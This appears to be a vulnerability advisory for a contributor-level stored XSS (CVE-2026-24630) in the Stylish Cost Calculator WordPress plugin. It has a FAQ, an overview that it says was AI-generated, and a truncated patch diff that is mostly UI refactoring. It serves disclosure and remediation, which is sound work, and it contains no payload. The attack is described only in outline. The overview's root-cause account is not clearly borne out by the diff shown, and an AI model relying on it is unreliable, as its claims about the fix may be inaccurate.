What is CVE-2026-24630?

CVE-2026-24630 is a stored cross-site scripting (XSS) vulnerability in the Stylish Cost Calculator plugin for WordPress, affecting versions up to 8.1.9. It allows authenticated users with contributor-level access or higher to inject arbitrary JavaScript into the plugin, which executes when administrators view the affected pages.

How does this vulnerability work?

The vulnerability arises from insufficient input sanitization in the plugin’s code. Authenticated attackers can submit crafted requests that include malicious JavaScript code in element titles, which is then stored in the database and executed when an administrator accesses the calculator editor interface.

Who is affected by this vulnerability?

Any WordPress site using the Stylish Cost Calculator plugin version 8.1.9 or earlier is affected. Specifically, users with contributor-level access or higher can exploit this vulnerability, potentially impacting site administrators and their data.

How can I check if my site is vulnerable?

To check for vulnerability, verify the version of the Stylish Cost Calculator plugin installed on your WordPress site. If it is version 8.1.9 or earlier, your site is vulnerable. Additionally, review any user accounts with contributor permissions or higher that could exploit this flaw.

How can I fix this vulnerability?

The vulnerability can be fixed by updating the Stylish Cost Calculator plugin to version 8.2.1 or later, where the issue has been patched. Regularly check for updates to all plugins and themes to ensure security against known vulnerabilities.

What if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the Stylish Cost Calculator plugin until a patch can be applied. Additionally, review user permissions and limit access to trusted users only to reduce the risk of exploitation.

What does a CVSS score of 6.4 indicate?

A CVSS score of 6.4 indicates a medium severity vulnerability. This means that while authentication is required to exploit the vulnerability, the potential impact on the site can be significant, including privilege escalation or site takeover.

What are the practical risks of this vulnerability?

If exploited, this vulnerability can allow attackers to execute arbitrary JavaScript in the context of administrator sessions. This could lead to data theft, unauthorized changes to the site, or even complete control over the site, depending on the attacker’s objectives.

How does the proof of concept demonstrate the issue?

The proof of concept outlines a method for exploiting the vulnerability by logging into a vulnerable WordPress site as a contributor and injecting a malicious script into the calculator element title. This script will execute when an administrator accesses the calculator editor, showcasing the risk of stored XSS.

What steps should I take after updating the plugin?

After updating the plugin, review user accounts and permissions to ensure that only trusted users have contributor or higher access. Monitor your site for any unusual activity and consider conducting a security audit to identify any other potential vulnerabilities.

Where can I find more information about this vulnerability?

More information about CVE-2026-24630 can be found on the official CVE database, security advisories from the plugin author, and security blogs that cover WordPress vulnerabilities. Staying informed through these resources can help maintain your site’s security.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-24630: Stylish Cost Calculator <= 8.1.9 – Authenticated (Contributor+) Stored Cross-Site Scripting (stylish-cost-calculator)

CVE ID CVE-2026-24630

Plugin stylish-cost-calculator

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 8.1.9

Patched Version 8.2.1

Disclosed January 8, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-24630:
This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the Stylish Cost Calculator WordPress plugin versions up to and including 8.1.9. The vulnerability allows attackers with contributor-level or higher permissions to inject arbitrary JavaScript payloads into calculator element titles. These payloads execute when administrators view the plugin’s edit interface, potentially leading to privilege escalation or site takeover.

Atomic Edge research identified the root cause in the `editElementModel.php` file’s `renderAdvancedOptions` method. The plugin fails to properly sanitize the `titleElement` parameter before outputting it in HTML contexts. The vulnerable code uses `echo esc_attr()` for some attributes but lacks proper output escaping for the `titleElement` value when used in tooltip data attributes. The diff shows extensive changes to the plugin’s admin interface, including the addition of new JavaScript modal systems and icon handling, but the core vulnerability stems from insufficient input validation in the element editing workflow.

The exploitation method requires authenticated access to the WordPress admin area with at least contributor privileges. Attackers can send crafted POST requests to the plugin’s AJAX handlers or form submission endpoints, injecting malicious JavaScript into the `titleElement` parameter. The payload persists in the database and executes when administrators load the calculator editor interface. The `elementController.php` file shows the vulnerable INSERT and UPDATE queries that store unsanitized user input in the `df_scc_elements` table.

The patch addresses the vulnerability by implementing proper output escaping throughout the admin interface. The diff reveals the addition of `scc_get_kses_extended_ruleset()` function calls for icon rendering and extensive refactoring of the HTML output generation. The plugin now uses WordPress’s KSES HTML filtering system to sanitize dynamic content before rendering. The changes in `editElementModel.php` show replacement of direct `echo` statements with properly escaped output functions, particularly for tooltip attributes and dynamic content insertion.

Successful exploitation enables attackers with contributor-level access to execute arbitrary JavaScript in the context of administrator sessions. This can lead to privilege escalation, site takeover, data theft, or malware injection. The stored nature means the payload executes every time administrators access the affected calculator editor, providing persistent access to the attacker. The CVSS score of 6.4 reflects the need for authentication but significant impact when exploited.

Differential between vulnerable and patched code

Code Diff

--- a/stylish-cost-calculator/admin/controllers/PageControllers/class-page-edit-calculator.php
+++ b/stylish-cost-calculator/admin/controllers/PageControllers/class-page-edit-calculator.php
@@ -24,10 +24,8 @@
 		wp_enqueue_script( 'scc-sortable' );
 		wp_enqueue_script( 'jquery-effects-core' );
 		wp_enqueue_script( 'jquery-ui-autocomplete' );
-
-		wp_enqueue_script( 'jquery-ui-tooltip' );
-
-		wp_enqueue_style( 'scc-admin-style' );
+        wp_enqueue_script( 'jquery-ui-tooltip' );
+        wp_enqueue_style( 'scc-admin-style' );

 		//added to load shortcode
 		wp_enqueue_style( 'scc-checkbox1' );
@@ -39,14 +37,39 @@
 		wp_enqueue_script( 'wp-util' );
 		wp_enqueue_script( 'scc-translate-js' );

-		$currencies_array = 'window["scc_currencies"] = ' . json_encode(
+		$lang = isset( $_SERVER['HTTP_ACCEPT_LANGUAGE'] ) ? substr( $_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2 ) : 'en';
+
+		// Define the path to the l10n files
+		if ( $lang === 'en') {
+			$lang = 'default';
+		}
+
+		$l10n_path = SCC_URL . 'lib/flatpickr/js/l10n/';
+		$flatpickr_path = SCC_URL . 'lib/flatpickr/js/';
+
+		wp_register_style( 'scc-flatpickr', SCC_URL . 'lib/flatpickr/css/flatpickr.min.css', [], scc_get_file_version( SCC_DIR . '/lib/flatpickr/css/flatpickr.min.css' ) );
+		wp_enqueue_style( 'scc-flatpickr' );
+        wp_enqueue_script( 'scc-flatpickr', $flatpickr_path . 'flatpickr.min.js', [], scc_get_file_version( SCC_DIR . '/lib/flatpickr/js/flatpickr.min.js' ), true );
+
+		// Check if the l10n file exists for the language
+		if ( file_exists( SCC_DIR . '/lib/flatpickr/js/l10n/' . $lang . '.js' ) ) {
+			wp_enqueue_script( 'scc-flatpickr-' . $lang, $l10n_path . $lang . '.js', [], scc_get_file_version( SCC_DIR . '/lib/flatpickr/js/l10n/' . $lang . '.js' ), true );
+		}
+
+		wp_register_style( 'scc-toast', SCC_URL . 'assets/css/modals/_toast.css', [], scc_get_file_version( SCC_DIR . '/assets/css/modals/_toast.css' ) );
+		wp_enqueue_style( 'scc-toast' );
+		wp_register_style( 'scc-banner', SCC_URL . 'assets/css/modals/_banner.css', [], scc_get_file_version( SCC_DIR . '/assets/css/modals/_banner.css' ) );
+		wp_enqueue_style( 'scc-banner' );
+		wp_register_style( 'scc-modal', SCC_URL . 'assets/css/modals/_modal.css', [], scc_get_file_version( SCC_DIR . '/assets/css/modals/_toast.css' ) );
+		wp_enqueue_style( 'scc-modal' );
+
+        $currencies_array = 'window["scc_currencies"] = ' . json_encode(
 			require_once( SCC_DIR . '/lib/currency_data.php' )
 		);
 		wp_add_inline_script( 'scc-frontend', $currencies_array );

 		add_thickbox();
-		// global $scc_googlefonts_var;
-
+
 		$f1          = $formC->readWithRelations( $_GET['id_form'] );
 		$isActivated = get_option( 'df_scc_licensed', 0 ) ? true : false;

--- a/stylish-cost-calculator/admin/controllers/PageControllers/class-pages-breadcrumbs.php
+++ b/stylish-cost-calculator/admin/controllers/PageControllers/class-pages-breadcrumbs.php
@@ -19,30 +19,42 @@
             wp_register_script( 'scc-marked', SCC_URL . 'lib/marked/marked.min.js', [], STYLISH_COST_CALCULATOR_VERSION, true );
             wp_enqueue_script( 'scc-marked' );
             wp_register_style( 'scc-back-end', SCC_URL . 'assets/css/scc-back-end.css', [], STYLISH_COST_CALCULATOR_VERSION );
+            wp_register_style( 'scc-tom-select', SCC_URL . 'assets/css/tom-select.css', [], STYLISH_COST_CALCULATOR_VERSION );
             wp_register_script( 'scc-sweet-alert', SCC_URL . 'lib/sweetalert2/sweetalert2.min.js', [ 'jquery' ], STYLISH_COST_CALCULATOR_VERSION, true );
             wp_register_style( 'scc-sweet-alert', SCC_URL . 'lib/sweetalert2/sweetalert2.min.css', [], STYLISH_COST_CALCULATOR_VERSION );
             wp_register_script( 'scc-wizard-quiz', SCC_URL . '/assets/js/scc-wizard-quiz.js', [ 'jquery' ], STYLISH_COST_CALCULATOR_VERSION, true );
             wp_enqueue_style( 'scc-fonts', 'https://fonts.googleapis.com/css2?family=Nunito:wght@300;400;500;600;700;800&display=swap' );
             wp_enqueue_style( 'scc-material', 'https://fonts.googleapis.com/icon?family=Material+Icons|Material+Icons+Outlined' );
+            wp_enqueue_style( 'scc-font-awesome', SCC_URL . 'lib/fontawesome/font-awesome.min.css', [], '6.4' );
             wp_enqueue_style( 'scc-sweet-alert' );
             wp_enqueue_script( 'scc-sweet-alert' );
             wp_enqueue_script( 'wp-util' );
             wp_enqueue_script( 'scc-bootstrap-min2' );
             wp_enqueue_style( 'scc-bootstrap-min2' );
             wp_enqueue_style( 'scc-back-end' );
+            wp_enqueue_style( 'scc-tom-select' );
             wp_enqueue_style( 'dashicons' );
             wp_enqueue_style( 'scc-sweetalert' );
             wp_enqueue_script( 'scc-sweetalert' );
             wp_enqueue_script( 'jquery-ui-dialog' );
             wp_enqueue_style( 'scc-jquery-ui-css', SCC_URL . 'lib/jquery-ui/jquery-ui.css', [], STYLISH_COST_CALCULATOR_VERSION );
-            wp_register_script( 'scc-backend', SCC_URL . 'assets/js/scc-backend.js', [ 'jquery' ], STYLISH_COST_CALCULATOR_VERSION, true );
+            // Modal system - register scripts in dependency order
+            wp_register_script( 'scc-modal-icons', SCC_URL . 'assets/js/modals/icons.js', [], STYLISH_COST_CALCULATOR_VERSION, true );
+            wp_register_script( 'scc-modal-model', SCC_URL . 'assets/js/modals/model.js', [ 'scc-modal-icons' ], STYLISH_COST_CALCULATOR_VERSION, true );
+            wp_register_script( 'scc-modal-state', SCC_URL . 'assets/js/modals/state.js', [ 'scc-modal-model' ], STYLISH_COST_CALCULATOR_VERSION, true );
+            wp_register_script( 'scc-modal-banner-utilities', SCC_URL . 'assets/js/modals/banner-utilities.js', [ 'scc-modal-state' ], STYLISH_COST_CALCULATOR_VERSION, true );
+            wp_register_script( 'scc-modal-view', SCC_URL . 'assets/js/modals/view.js', [ 'scc-modal-banner-utilities' ], STYLISH_COST_CALCULATOR_VERSION, true );
+            wp_register_script( 'scc-modal-controller', SCC_URL . 'assets/js/modals/controller.js', [ 'scc-modal-view' ], STYLISH_COST_CALCULATOR_VERSION, true );
+            wp_register_script( 'scc-modal-init', SCC_URL . 'assets/js/modals/init.js', [ 'scc-modal-controller' ], STYLISH_COST_CALCULATOR_VERSION, true );
+            wp_enqueue_script( 'scc-modal-init' );
+            wp_register_script( 'scc-backend', SCC_URL . 'assets/js/scc-backend.js', [ 'jquery', 'scc-modal-init' ], STYLISH_COST_CALCULATOR_VERSION, true );
             wp_enqueue_script( 'scc-backend' );
-
+            wp_enqueue_script( 'jquery-ui-tooltip' );
+            wp_enqueue_style( 'jquery-ui-tooltip' );
             wp_register_script( 'scc-tour', SCC_URL . 'lib/introjs/js/introjs.min.js', [], STYLISH_COST_CALCULATOR_VERSION, true );
             wp_register_style( 'scc-tour', SCC_URL . 'lib/introjs/css/introjs.min.css', [], STYLISH_COST_CALCULATOR_VERSION );
             wp_enqueue_style( 'scc-tour' );
             wp_enqueue_script( 'scc-tour' );
-
             wp_register_script( 'scc-tom-select-backend', SCC_URL . 'lib/tom-select/tom-select.base.js', [ 'jquery' ], STYLISH_COST_CALCULATOR_VERSION, true );
             wp_register_style( 'scc-tom-select-backend', SCC_URL . 'lib/tom-select/tom-select.css', [], STYLISH_COST_CALCULATOR_VERSION );
             wp_enqueue_script( 'scc-tom-select-backend' );
--- a/stylish-cost-calculator/admin/controllers/elementController.php
+++ b/stylish-cost-calculator/admin/controllers/elementController.php
@@ -22,6 +22,7 @@
 	 * @param string $value2
 	 * @param string $value3
 	 * @param string $value4
+	 * @param string $value6
 	 * @param string $length to be removed
 	 * @param string $uniqueId to be removed
 	 * @param string $mandatory
@@ -49,6 +50,7 @@
 		( isset( $values['value2'] ) ) ? $value2                         = $values['value2'] : $value2 = null;
 		( isset( $values['value3'] ) ) ? $value3                         = $values['value3'] : $value3 = null;
 		( isset( $values['value4'] ) ) ? $value4                         = $values['value4'] : $value4 = null;
+		( isset( $values['value6'] ) ) ? $value6                         = $values['value6'] : $value6 = null;
 		( isset( $values['length'] ) ) ? $length                         = $values['length'] : $length = '12asd';
 		( isset( $values['uniqueId'] ) ) ? $uniqueId                     = $values['uniqueId'] : $uniqueId = unique();
 		( isset( $values['mandatory'] ) ) ? $mandatory                   = $values['mandatory'] : $mandatory = 0;
@@ -59,11 +61,11 @@
 		( isset( $values['displayFrontend'] ) ) ? $displayFrontend       = $values['displayFrontend'] : $displayFrontend = 0;
 		( isset( $values['displayDetailList'] ) ) ? $displayDetailList   = $values['displayDetailList'] : $displayDetailList = 0;
 		( isset( $values['showInputBoxSlider'] ) ) ? $showInputBoxSlider = $values['showInputBoxSlider'] : $showInputBoxSlider = 00;
+        ( isset( $values['showTitlePdf'] ) ) ? $showTitlePdf = $values['showTitlePdf'] : $showTitlePdf = 0;

-		( isset( $values['showTitlePdf'] ) ) ? $showTitlePdf = $values['showTitlePdf'] : $showTitlePdf = 0;
-		$query  = $this->db->prepare(
-			"INSERT INTO {$this->db->prefix}df_scc_elements (`orden`,`titleElement`,`type`,`value1`,`value2`,`value3`,`value4`,`length`,`uniqueId`,`mandatory`,`titleColumnDesktop`,
-        `titleColumnMobile`, `subsection_id`, `showPriceHint`, `displayFrontend`, `displayDetailList`, `showTitlePdf`,`showInputBoxSlider`) VALUES (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s);",
+	    $query  = $this->db->prepare(
+			"INSERT INTO {$this->db->prefix}df_scc_elements (`orden`,`titleElement`,`type`,`value1`,`value2`,`value3`,`value4`,`value6`,`length`,`uniqueId`,`mandatory`,`titleColumnDesktop`,
+        `titleColumnMobile`, `subsection_id`, `showPriceHint`, `displayFrontend`, `displayDetailList`, `showTitlePdf`,`showInputBoxSlider`) VALUES (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s);",
 			$orden,
 			$titleElement,
 			$type,
@@ -71,6 +73,7 @@
 			$value2,
 			$value3,
 			$value4,
+			$value6,
 			$length,
 			$uniqueId,
 			$mandatory,
@@ -83,6 +86,7 @@
 			$showTitlePdf,
 			$showInputBoxSlider
 		);
+
 		$result = $this->db->query( $query );
 		$id     = $this->db->insert_id;
 		if ( $result ) {
@@ -139,6 +143,7 @@
 		( isset( $values['value4'] ) ) ? $value4                         = $values['value4'] : $value4 = $todo->value4;
 		$value5 														 = isset( $values['value5'] ) ? $values['value5'] : $todo->value5;
 		$value5                                                          = intval( $value5 );
+		( isset( $values['value6'] ) ) ? $value6                         = $values['value6'] : $value6 = $todo->value6;
 		( isset( $values['length'] ) ) ? $length                         = $values['length'] : $length = $todo->length;
 		( isset( $values['uniqueId'] ) ) ? $uniqueId                     = $values['uniqueId'] : $uniqueId = $todo->uniqueId;
 		( isset( $values['mandatory'] ) ) ? $mandatory                   = $values['mandatory'] : $mandatory = $todo->mandatory;
@@ -152,8 +157,8 @@
 		( isset( $values['element_woocomerce_product_id'] ) ) ? $element_woocomerce_product_id = $values['element_woocomerce_product_id'] : $element_woocomerce_product_id = $todo->element_woocomerce_product_id;
 		( isset( $values['showInputBoxSlider'] ) ) ? $showInputBoxSlider                       = $values['showInputBoxSlider'] : $showInputBoxSlider = 0;

-		$query    = $this->db->prepare(
-			"UPDATE {$this->db->prefix}df_scc_elements SET orden =%s,titleElement=%s,`type`=%s,value1=%s,value2=%s,value3=%s,value4=%s,value5=%d,`length`=%s,uniqueId=%s,mandatory=%d,titleColumnDesktop=%s,
+	    $query    = $this->db->prepare(
+			"UPDATE {$this->db->prefix}df_scc_elements SET orden =%s,titleElement=%s,`type`=%s,value1=%s,value2=%s,value3=%s,value4=%s,value5=%d,value6=%s,`length`=%s,uniqueId=%s,mandatory=%d,titleColumnDesktop=%s,
         titleColumnMobile=%s, subsection_id=%d, showPriceHint=%d, displayFrontend=%d, displayDetailList=%d, showTitlePdf=%d, element_woocomerce_product_id=%s,showInputBoxSlider=%d WHERE id =%d",
 			$orden,
 			$titleElement,
@@ -163,6 +168,7 @@
 			$value3,
 			$value4,
 			$value5,
+			$value6,
 			$length,
 			$uniqueId,
 			$mandatory,
@@ -177,7 +183,8 @@
 			$showInputBoxSlider,
 			$id
 		);
-		$response = $this->db->query( $query );
+
+	    $response = $this->db->query( $query );
 		if ( $response ) {
 			return true;
 		} else {
--- a/stylish-cost-calculator/admin/models/editElementModel.php
+++ b/stylish-cost-calculator/admin/models/editElementModel.php
@@ -7,14 +7,17 @@
     protected $df_scc_form_currency;
     protected $is_woocommerce_enabled;
     public $woo_commerce_products;
+	private $scc_icons;
+
     public function __construct( $calc_id = false, $is_from_ajax = false, $is_woocommerce_enabled = false ) {
         $this->calc_id                = $calc_id;
         $this->is_from_ajax           = $is_from_ajax;
         $this->df_scc_form_currency   = get_option( 'df_scc_currency', 'USD' );
         $this->is_woocommerce_enabled = false;
+		$this->scc_icons = require SCC_DIR . '/assets/scc_icons/icon_rsrc.php';
     }

-    public function renderAdvancedOptions( $el ) {
+    public function renderAdvancedOptions( $el ) {
         $defaults = [
             'orden'              => 0,
             'titleElement'       => 'Title',
@@ -44,7 +47,7 @@
 		<div class="scc-content" style="display: none;">
 			<div class="scc-transition px-0 advanced-option-wrapper">
 				<?php if ( $el->type == 'custom math' ) { ?>
-						<div>
+						<p>
 							<label class="scc-accordion_switch_button">
 								<input onchange="changeDisplayFrontend(this)" class="scc_mandatory_dropdown" type="checkbox"
 								<?php
@@ -56,8 +59,8 @@
 								<span class="scc-accordion_toggle_button round"></span>
 							</label>
 							<span>Display on Frontend Form</span>
-						</div>
-						<div>
+							</p>
+						<p>
 							<label class="scc-accordion_switch_button">
 								<input onchange="changeDisplayDetail(this)" class="scc_mandatory_dropdown" type="checkbox"
 								<?php
@@ -69,8 +72,8 @@
 								<span class="scc-accordion_toggle_button round"></span>
 							</label>
 							<span>Display on Detailed List</span>
-						</div>
-						<div>
+				</p>
+						<p>
 							<label class="scc-accordion_switch_button">
 								<input onchange="changeCalculationSymbol(this)" class="scc_mandatory_dropdown" type="checkbox"
 								<?php
@@ -82,7 +85,7 @@
 								<span class="scc-accordion_toggle_button round"></span>
 							</label>
 							<span>Show Calculation Symbol</span>
-						</div>
+				</p>
 					</div>
 				</div>
 					<?php
@@ -142,7 +145,7 @@
 					</div>
 					<?php } ?>
 					<?php if ( $el->type !== 'texthtml' ) { ?>
-					<div class="scc-advanced-option-cont">
+					<p class="scc-advanced-option-cont">
 						<label class="scc-accordion_switch_button">
 							<input onchange="changeMandatoryElement(this)" class="scc_mandatory_dropdown" name="scc_mandatory_dropdown" type="checkbox"
 							<?php
@@ -155,9 +158,14 @@
 						</label>
 						<span>
 							<span class="scc-adv-opt-lbl" >Mandatory</span>
-							<i class="material-icons-outlined with-tooltip" data-element-tooltip-type="mandatory-elements-tt" data-bs-original-title="" title="" style="margin-right:5px">help_outline</i>
+							<i
+							data-element-tooltip-type="mandatory-elements-tt"
+							class="material-icons-outlined more-settings-info"
+							style="margin-right:5px">
+							<span class="scc-icn-wrapper"><?php echo scc_get_kses_extended_ruleset( $this->scc_icons['help-circle'] ); ?></span>
+						</i>
 						</span>
-					</div>
+					</p>

 						<?php
 					}
@@ -180,15 +188,20 @@
                     }
         ?>
 				<?php if ( in_array( $el->type, [ 'checkbox', 'slider' ] ) ) { ?>
-				<div class="scc-advanced-option-cont">
+				<p class="scc-advanced-option-cont">
 					<label class="scc-accordion_switch_button">
 						<input onchange="changeShowPriceHintElement(this)" class="scc_mandatory_dropdown" name="scc_mandatory_dropdown" type="checkbox" disabled>
 						<span class="scc-accordion_toggle_button round"></span>
 					</label>
 					<span><span class="scc-adv-opt-lbl">Show Price Hint</span>
-					<i class="material-icons-outlined with-tooltip" data-element-tooltip-type="enable-price-hint-bubble-tt" data-bs-original-title="" title="" style="margin-right:5px">help_outline</i>
+					<i
+						data-element-tooltip-type="enable-price-hint-bubble-tt"
+						class="material-icons-outlined more-settings-info"
+						style="margin-right:5px">
+						<span class="scc-icn-wrapper"><?php echo scc_get_kses_extended_ruleset( $this->scc_icons['help-circle'] ); ?></span>
+					</i>
 					</span>
-				</div>
+				<p>
 				<?php } ?>
 				<?php if ( in_array( $el->type, [ 'quantity box' ] ) ) { ?>
 					<p class="scc-advanced-option-cont">
@@ -202,13 +215,19 @@
 							<span class="scc-accordion_toggle_button round"></span>
 						</label>
 						<span>
-							<span class="scc-adv-opt-lbl use-tooltip">Enable commas </span>
-							<i class="material-icons-outlined with-tooltip" data-element-tooltip-type="qnt-input-comma-number" data-bs-original-title="" title="" style="margin-right:5px">help_outline</i>
+							<span class="scc-adv-opt-lbl use-tooltip">Enable commas </span>
+							<i
+								data-element-tooltip-type="qnt-input-comma-number"
+								class="material-icons-outlined more-settings-info"
+								style="margin-right:5px">
+								<span class="scc-icn-wrapper"><?php echo scc_get_kses_extended_ruleset( $this->scc_icons['help-circle'] ); ?></span>
+							</i>
 						</span>
 					</p>
 				<?php } ?>
-				<?php if ( in_array( $el->type, [ 'slider', 'texthtml' ] ) ) { ?>
-				<div class="scc-advanced-option-cont">
+				<?php if ( in_array( $el->type, [ 'slider', 'texthtml', 'date' ] ) ) { ?>
+
+				<p class="scc-advanced-option-cont">
 					<label class="scc-accordion_switch_button">
 						<input onchange="toggleSliderDisplayinDetail(this)" name="scc_hide_slider_on_detailed_view" type="checkbox"
 						<?php
@@ -220,12 +239,18 @@
 						<span class="scc-accordion_toggle_button round"></span>
 					</label>
 					<span><span class="scc-adv-opt-lbl">Show on Detailed List</span>
-					<i class="material-icons-outlined with-tooltip" data-element-tooltip-type="display-on-detailed-list-pdf-tt" data-bs-original-title="" title="" style="margin-right:5px">help_outline</i>
+				    <i
+						data-element-tooltip-type="display-on-detailed-list-pdf-tt"
+						class="material-icons-outlined more-settings-info"
+						style="margin-right:5px">
+						<span class="scc-icn-wrapper"><?php echo scc_get_kses_extended_ruleset( $this->scc_icons['help-circle'] ); ?></span>
+					</i>
+
 					</span>
-				</div>
+				</p>
 				<?php } ?>
 				<?php if ( in_array( $el->type, [ 'slider' ] ) ) { ?>
-				<div class="scc-advanced-option-cont">
+				<p class="scc-advanced-option-cont">
 					<label class="scc-accordion_switch_button">
 						<input onchange="toggleSliderInputBoxShowHide(this)" name="scc_show_inputbox_slider" type="checkbox"
 						<?php
@@ -237,10 +262,15 @@
 						<span class="scc-accordion_toggle_button round"></span>
 					</label>
 					<span><span class="scc-adv-opt-lbl">Add Input Box To Slider</span>
-					<i class="material-icons-outlined with-tooltip" data-element-tooltip-type="append-quantity-input-box-tt" data-bs-original-title="" title="" style="margin-right:5px">help_outline</i>
-					</span>
-				</div>
-				<div class="row gx-2 mt-2 scc-advanced-option-cont">
+					<i
+						data-element-tooltip-type="append-quantity-input-box-tt"
+						class="material-icons-outlined more-settings-info"
+						style="margin-right:5px">
+						<span class="scc-icn-wrapper"><?php echo scc_get_kses_extended_ruleset( $this->scc_icons['help-circle'] ); ?></span>
+					</i>
+				    </span>
+				</p>
+				<p class="row gx-2 mt-2 scc-advanced-option-cont">
 					<div class="col-md-6 input-field">
 						<input id="<?php echo esc_attr( 'slider-starting-value-' . $el->id ); ?>" type="number" onchange="changeValue3(this, true);" onkeyup="changeValue3(this)" value="<?php echo esc_attr( $el->value3 ); ?>" style="margin-bottom: 0px;">
 						<label for="<?php echo esc_attr( 'slider-starting-value-' . $el->id ); ?>" class="active form-label fw-bold">Starting value</label>
@@ -249,11 +279,11 @@
 						<input id="<?php echo esc_attr( 'slider-steps-value-' . $el->id ); ?>" type="number" onchange="changeValue2(this)" onkeyup="changeValue2(this)" value="<?php echo esc_attr( $el->value2 ); ?>" style="margin-bottom: 0px;">
 						<label for="<?php echo esc_attr( 'slider-steps-value-' . $el->id ); ?>" class="active form-label fw-bold">Slider steps</label>
 					</div>
-				</div>
+				</p>
 				<p class="d-none slider-start-value-warning" style="color: red;">The starting value cannot be smaller than the base from value.</p>
 			   <?php } ?>
 				<?php if ( in_array( $el->type, [ 'math', 'Dropdown Menu' ] ) ) { ?>
-				<div class="scc-advanced-option-cont">
+				<p class="scc-advanced-option-cont">
 					<label class="scc-accordion_switch_button">
 						<input onchange="changeShowTitlePdf(this)" class="scc_mandatory_dropdown" name="scc_mandatory_dropdown" type="checkbox"
 						<?php
@@ -264,14 +294,296 @@
 						>
 						<span class="scc-accordion_toggle_button round"></span>
 					</label>
-					<span class="scc-adv-opt-lbl">Show Title on Detailed List & PDF
-						<i class="material-icons-outlined with-tooltip" data-element-tooltip-type="show-title-on-detailed-list-tt" data-bs-original-title="" title="" style="margin-right:5px">help_outline</i>
+					<span class="scc-adv-opt-lbl">Show Title on Detailed List
+				    <i
+						data-element-tooltip-type="show-title-on-detailed-list-tt"
+						class="material-icons-outlined more-settings-info"
+						style="margin-right:5px">
+						<span class="scc-icn-wrapper"><?php echo scc_get_kses_extended_ruleset( $this->scc_icons['help-circle'] ); ?></span>
+					</i>
 					</span>
-				</div>
+				</p>
 					<?php
 				}

-                if ( $el->type != 'checkbox' ) {
+					if ( in_array( $el->type, [ 'date' ] ) ) {
+					if ( $el->type == 'date') {
+						$value6_default  = 'date-picker-element';
+					}
+                $value6_default  = DF_SCC_ELEMENT_DEFAULT_VALUES[$value6_default]['advanced']['value6'];
+                $scc_date_config = wp_parse_args(
+                    json_decode( wp_unslash( !empty( $el->value6 ) ? $el->value6 : '' ), true ),
+                    $value6_default
+                );
+                $hours_12           = range( 1, 12 );
+                $hours_24           = range( 0, 23 );
+                $numbers_0_to_55    = range( 0, 55, 5 );
+                $show_time_options  = isset( $scc_date_config['enable_time_picker'] ) ? boolval( $scc_date_config['enable_time_picker'] ) : false;
+                $show_12h_options   = boolval( $scc_date_config['limit_hours'] ) && $scc_date_config['time_format'] === '12h' && $show_time_options;
+                $show_24h_options   = boolval( $scc_date_config['limit_hours'] ) && $scc_date_config['time_format'] === '24h' && $show_time_options;
+                ?>
+				<p>
+					<label class="scc-accordion_switch_button">
+						<input
+							data-element-id="<?php echo intval( $el->id ); ?>"
+							data-value6-key="disable_past_days"
+							<?php echo boolval( $scc_date_config['disable_past_days'] ) ? 'checked' : ''; ?>
+							type="checkbox">
+						<span class="scc-accordion_toggle_button round"></span>
+					</label>
+					<span class="scc-adv-opt-lbl">Disable Past Days
+						<i
+							class="material-icons-outlined more-settings-info"
+							data-element-tooltip-type="display-past-days-tt"
+							style="margin-right:5px">
+							<span class="scc-icn-wrapper"><?php echo scc_get_kses_extended_ruleset( $this->scc_icons['help-circle'] ); ?></span>
+						</i>
+					</span>
+				</p>
+				<p>
+					<label class="scc-accordion_switch_button">
+						<input
+							data-element-id="<?php echo intval( $el->id ); ?>"
+							data-value6-key="disable_today_date"
+							<?php echo boolval( $scc_date_config['disable_today_date'] ) ? 'checked' : ''; ?>
+							type="checkbox"
+							class="scc-disable-today-date"
+							>
+						<span class="scc-accordion_toggle_button round"></span>
+					</label>
+					<span class="scc-adv-opt-lbl">Disable Today's Date
+						<i
+							class="material-icons-outlined more-settings-info"
+							data-element-tooltip-type="date-picker-disable-today-date-tt"
+							style="margin-right:5px">
+							<span class="scc-icn-wrapper"><?php echo scc_get_kses_extended_ruleset( $this->scc_icons['help-circle'] ); ?></span>
+						</i>
+					</span>
+				</p>
+				<p>
+					<label class="scc-accordion_switch_button">
+						<input
+							data-element-id="<?php echo intval( $el->id ); ?>"
+							<?php echo boolval( $scc_date_config['enable_limit_days'] ) ? 'checked' : ''; ?>
+							data-value6-key="enable_limit_days"
+							type="checkbox">
+						<span class="scc-accordion_toggle_button round"></span>
+					</label>
+					<span class="scc-adv-opt-lbl"
+						data-bs-original-title="">Limit Days
+						<i
+							data-element-tooltip-type="limit-days-tt"
+							class="material-icons-outlined more-settings-info"
+							style="margin-right:5px">
+							<span class="scc-icn-wrapper"><?php echo scc_get_kses_extended_ruleset( $this->scc_icons['help-circle'] ); ?></span>
+						</i>
+					</span>
+				</p>
+				<div class="scc-days-wrapper p-3 <?php echo boolval( $scc_date_config['enable_limit_days'] ) ? '' : 'd-none'; ?>">
+					<p class="scc-days-wrapper-lead">Choose days to exclude</p>
+					<div class="days-select" data-value6-key="limit_days" data-value6-type="array-checkboxes">
+						<?php foreach ( [ 'Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun' ] as $value ) {
+						    $is_checked = in_array( $value, $scc_date_config['limit_days'] ) ? 'checked' : '';
+						    echo "<label class='day'><input data-element-id=" . intval( $el->id ) . ' ' . $is_checked . " type='checkbox' value='$value'><span>$value</span></label>";
+						} ?>
+					</div>
+				</div>
+				<hr>
+			<div class="scc-accordion-tooltip" style="text-align:left; width:100%">
+				<div class="row gx-2 scc-edit-input-option-wrapper">
+					<div class="col-md-4" style="margin-bottom: 1rem">
+						<label class="use-tooltip fw-bold" title="Select the minimum date in which it is allowed to choose dates"
+						style="font-size:14px; transform:scale(0.8)">Min date </label>
+						<input placeholder="yyyy-mm-dd" type="text" data-date-structure data-picker-field="min-date" class="input_pad inputoption_2 scc-datepicker-editor"
+						style="text-align:center;height:35px; min-width:158px;" placeholder=""
